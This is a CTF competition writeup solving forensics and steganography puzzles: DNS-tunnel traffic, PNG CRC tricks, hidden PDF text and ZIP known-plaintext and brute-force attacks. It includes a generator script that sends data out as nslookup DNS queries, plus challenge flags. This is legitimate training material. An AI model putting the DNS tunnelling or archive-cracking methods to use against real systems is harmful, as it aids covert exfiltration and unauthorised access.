
Title: The first "Neosoft Cup" Cybersecurity CTF Competition in 2021 - Official WriteUp (Repost)

MISC

1 Sign in

Difficulty Sign in

Copy the given flag and submit it.

2 range_download

Difficulty Medium

flag{6095B134-5437-4B21-BE52-EDC46A276297}

0x01

Analyzing the DNS traffic shows that DNS tunnel data exists in the traffic matching ip.addr==1.1.1.1. After sorting the queries, the following base64 string is obtained:

cGFzc3dvcmQ6IG5zc195eWRzIQ==

Decode the base64 to get:

password: nss_yyds!

0x02

Analyzing the HTTP traffic shows that ip.addr==172.21.249.233 carries a segmented HTTP download in which each request fetches only one byte, as specified by the Range request header. Because the bytes are downloaded in random order, they have to be sorted by offset. After sorting, you get an encrypted compressed archive.

During reassembly you will find that the byte at position 2349 is missing and has to be repaired.

Since we obtained the zip password in 0x01, we can brute-force the missing byte: when the archive decrypts with the correct password, the repair has succeeded.
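
The reassembly and single-byte repair from 0x02, as an added example that is not part of the original writeup: it orders one-byte range responses by offset, reports the gap, and tries all 256 values until the archive verifies. Assumptions: the sample is a constructed, unencrypted ZIP, the archive's CRC check stands in for the password test the writeup uses, and all function names are hypothetical.

```python
import io
import random
import zipfile

def reassemble(responses, total):
    """Place (offset, byte) pairs into a buffer; return (buffer, missing offsets)."""
    buf = bytearray(total)
    seen = set()
    for offset, byte in responses:
        buf[offset] = byte
        seen.add(offset)
    return buf, sorted(set(range(total)) - seen)

def archive_ok(blob):
    """Oracle: True when every member of the archive passes its integrity check."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return zf.testzip() is None
    except zipfile.BadZipFile:
        return False

def repair(buf, offset):
    """Try all 256 values at `offset`; keep and return the one that verifies."""
    for value in range(256):
        buf[offset] = value
        if archive_ok(bytes(buf)):
            return value
    return None

def build_sample(missing=50):
    """Constructed capture: shuffled one-byte responses with one offset absent."""
    raw = io.BytesIO()
    with zipfile.ZipFile(raw, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("qr.txt", "constructed payload standing in for the QR image")
    blob = raw.getvalue()
    pairs = [(i, b) for i, b in enumerate(blob) if i != missing]
    random.Random(0).shuffle(pairs)      # the responses arrive in random order
    return blob, pairs

if __name__ == "__main__":
    blob, pairs = build_sample()
    buf, gaps = reassemble(pairs, len(blob))
    print("missing offsets:", gaps, "repaired value:", repair(buf, gaps[0]))
```

In a real capture the (offset, byte) pairs come from each request's Range header and the matching response body.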

0x03

Unzip the compressed package and get the QR code.

After scanning, we get:

5133687161454e534e6b394d4d325a7854475233566e6870626a42554e6a5a4a5645466c4e47786a62324e464d47705557464635546d6c536148565165564659645563774e327073515863324f5846555247314555564134555570706344686957444d336544684c596c4255556e6333636e687165486c756446413351577470566e4242526b6c4a5457316c515452754d555661636e4a7859556430566c4d3559557844656a4a35626c68334d6d5a4c51513d3d

Ciphey analysis obtains the flag:

Possible plaintext: 'flag{6095B134-5437-4B21-BE52-EDC46A276297}' (y/N): y
╭────────────────────────────────────────────────────────────────╮
│ The plaintext is a Capture The Flag (CTF) Flag                 │
│ Formats used:                                                  │
│    hexadecimal                                                 │
│    base64                                                      │
│    utf8                                                        │
│    base62                                                      │
│    base58_bitcoin                                              │
│    base32                                                      │
│    utf8Plaintext: 'flag{6095B134-5437-4B21-BE52-EDC46A276297}' │
╰────────────────────────────────────────────────────────────────╯

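import os
import time
import requests
import random

# Send each base64 fragment as a DNS query to 1.1.1.1 (the DNS tunnel data)
for i in 'cG Fz c3 dv cm Q6 IG 5z c1 95 eW Rz IQ=='.split(' '):
    os.system('nslookup ' + i + '.nss.neusoft.edu.cn 1.1.1.1')
    time.sleep(5)

# Total size of the archive, taken from the Content-Length header
l = int(requests.head('http://172.21.249.233/flag.7z', stream=True).headers['Content-Length'])
a = set()  # offsets that have already been requested

# Request one byte at a time at random offsets until l distinct offsets have been requested
while len(a) != l:
    b = random.randint(0, l)  # randint is inclusive, so b == l is out of range
    r = requests.get('http://172.21.249.233/flag.7z', stream=True, headers={'Range': 'bytes=' + str(b) + '-' + str(b)})
    if r.status_code == 416:  # 416 Range Not Satisfiable
        print(b)
    a.add(b)
    print(len(a))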

0x04

Difficulty Sign in

flag: flag{zhe_ti_mu_ye_tai_bt_le_XD}

This question examines the use of PNG structure and common tools.

The challenge simply stores an extra zlib data stream in the IDAT data, which binwalk can extract directly.

binwalk -Me PNG.png

3 is just a PNG, don't think too much.png

Difficulty Difficult

flag:

flag{zheshirenchude}

This question examines how well you understand the PNG structure and common challenge patterns.

The challenge file is a PNG picture; binwalk reports nothing unusual.

Opening it in 010 Editor shows a CRC error, but the structure itself shows no problem for the time being.

Opening it in TweakPNG shows that the CRC values of the IHDR, IDAT, and IEND chunks are all incorrect.

Then view it in StegSolve: the picture contains hidden boxes. One box selects the IDAT data, indicating that the IDAT data has something special that needs to be examined.

That is all the information the picture itself gives. Looking at the PNG structure, the first problem is the IHDR chunk CRC, which generally means the image height has been modified. Using a CRC inverse-calculation script (or simply changing the height value blindly) reveals a hidden image below the visible picture. Viewing it in StegSolve shows a hidden pattern.

The three boxes circle some data structures of the PNG image. The second box shows that PNG image data is compressed using zlib; boxing it indicates that you need to pay attention to the zlib-compressed data.

The third box is the specific compressed block data structure. The content of this picture is a screenshot of the libpng official website, but when you actually visit the official website, you can see that the compressed block structure shown in the screenshot does not match.

The numbers have been deliberately modified, so the number sequence 2233 should be some key or hint for the challenge.

Next, the CRC values of all IDAT chunks are incorrect. Copy all the CRC values and hex-decode them. The result is a hint:

hintis[IEND_and_11]_jiayou_XD.

Look at IEND as the hint says. A normal IEND chunk is empty and only marks the end of the file, but here it contains data.

Extracting the data shows that the first four hex digits are 9C 78, whereas the zlib data header is 78 9C. Correct the first four digits and decompress. The result is base64, which is then decoded. This yields the first part of the flag:

flag{zheshi

With the first part recovered, the 11 in the hint is still unresolved. Inspection shows that chunk 11 is the last IDAT chunk. Recalling the earlier 2233 hint, search the whole chunk for 2233: it appears only once, at the end of the chunk.

Following the approach used for the first part, guess that this is also zlib-compressed data: copy the 32 hex values from the start of 2233 up to the CRC value, and change 2233 to the zlib data header 78 9C.

The decompressed data turns out to be encoded. Given the first part of the flag, this should be another encoding from the base family. basecrack or an online base decoder shows that it is base91, and it decodes to renchude}

The second part of the flag is: renchude}

Merge the two parts to get the final flag

flag{zheshirenchude}
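
The CRC and IEND checks described above can be scripted. The following added example (not part of the original writeup) parses PNG chunks, collects the stored CRC of every IDAT chunk whose CRC does not verify, and repairs a swapped zlib header in the IEND payload. `build_sample` constructs a small stand-in file with made-up contents, and all function names are hypothetical.

```python
import base64, struct, zlib
PNG_SIG = b"\x89PNG\r\n\x1a\n"

def chunk(ctype, data, crc=None):
    """Serialise a chunk; `crc` overrides the real CRC, as the challenge did."""
    if crc is None:
        crc = struct.pack(">I", zlib.crc32(ctype + data))
    return struct.pack(">I", len(data)) + ctype + data + crc

def parse_chunks(png):
    """Yield (type, data, stored_crc, crc_ok) for each chunk."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos < len(png):
        if pos + 12 > len(png):
            raise ValueError("truncated chunk")
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype, end = png[pos + 4:pos + 8], pos + 8 + length
        data, stored = png[pos + 8:end], png[end:end + 4]
        if len(stored) != 4:
            raise ValueError("truncated chunk")
        yield ctype, data, stored, stored == struct.pack(">I", zlib.crc32(ctype + data))
        pos = end + 4

def analyse(png):
    """Return (bytes hidden in bad IDAT CRCs, text recovered from IEND)."""
    hint, recovered = b"", None
    for ctype, data, stored, ok in parse_chunks(png):
        if ctype == b"IDAT" and not ok:
            hint += stored                    # CRC field reused as a 4-byte message slot
        elif ctype == b"IEND" and data[:2] == b"\x9c\x78":
            fixed = b"\x78\x9c" + data[2:]    # restore the zlib header 78 9C
            recovered = base64.b64decode(zlib.decompress(fixed))
    return hint, recovered

def build_sample():
    """Constructed stand-in for the challenge file (not the real image)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")
    msg = b"hintis[IEND]"                     # 12 bytes -> three fake CRC fields
    blob = zlib.compress(base64.b64encode(b"flag{sample"))
    out = PNG_SIG + chunk(b"IHDR", ihdr)
    for i in range(0, len(msg), 4):
        out += chunk(b"IDAT", idat, crc=msg[i:i + 4])
    return out + chunk(b"IEND", b"\x9c\x78" + blob[2:])

if __name__ == "__main__":
    print(analyse(build_sample()))
```

A well-formed PNG yields an empty hint and `None`, so any other result marks a file worth opening in a hex editor.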

Difficulty Simple

View PDF

I found many hints in the text about things getting lighter and lighter.

Thinking that the flag may be hidden in white text, select all the text.

I found a blank-looking word at the end of the second-to-last paragraph.

Copy it out, or change it to another color.

Get flag

flag{hey_there_is_no_thing}

Where is

Difficulty Difficult

This question examines the practical application of known-plaintext attacks. In a real environment, a plaintext file is not handed to you for the attack; you need to find a plaintext file, or some portion of plaintext, yourself.

The compressed package contains two files, LICENSE and README.md.

LICENSE is an open-source license file.

Download all the common open-source licenses and compare their sizes.

The Apache 2.0 license turns out to be very similar in size.

Using the built-in LICENSE file from GitHub as the plaintext, the archive decrypts successfully.

There is also a simpler method. Many open-source licenses start with spaces, so you can directly use a run of repeated spaces as the known plaintext.

6 eviptedzip

Difficulty Simple

The image is a QR code that is missing its locator patterns. After restoring them, scanning gives a hint: a common steganography technique.

Split the image apart to get a compressed package.

After decompression, use stegpy to get the flag.

flag{Do_U_Kn0w_Ste9py?}

7 easysteg

Difficulty Simple

The first layer is 50996.zip

Write a script to decrypt the recursively nested compressed package, which is 300 layers deep.

8 Compression Package Compression Package Compression Package

mkdir zips
mkdir zips/files
mv 50996.zip ./zips
cd zips
while :
do
    # pick the entry with the oldest modification time
    file=$(ls -t | tail -1)
    # derive the password from the zipinfo listing: field 12, extension stripped
    pass=$(zipinfo "$file" | grep - | cut -d ' ' -f12 | cut -d . -f1)
    unzip -P "$pass" "$file"
    echo "unzip -P $pass $file"
    mv "$file" ./files
done

The last layer is 23333.zip; its 6-digit numeric password is 756698.

Open the SQLite database and find the flag in the employees table.

flag{Unz1p_i5_So_C00l##}

Problem Solving Script

WEB

Difficulty Medium

9 flag

Sort the messages by hand, then decode the base64 mentally.

Solution 1

Wait until the website has produced enough output, copy it, and then use the search/replace function supported by most text editors to rewrite the messages into a format similar to the following.

a = list('a' * 24)  # placeholder buffer; must be longer than the highest index
# ...
a[1] = 'a'
a[20] = 'b'
a[3] = 'c'
# ...
# at last
import base64
print(base64.b64decode(''.join(a)))

Solution 2

The challenge uses SSE to push messages to the browser in real time. The route is '/flag', so you can directly:

import base6
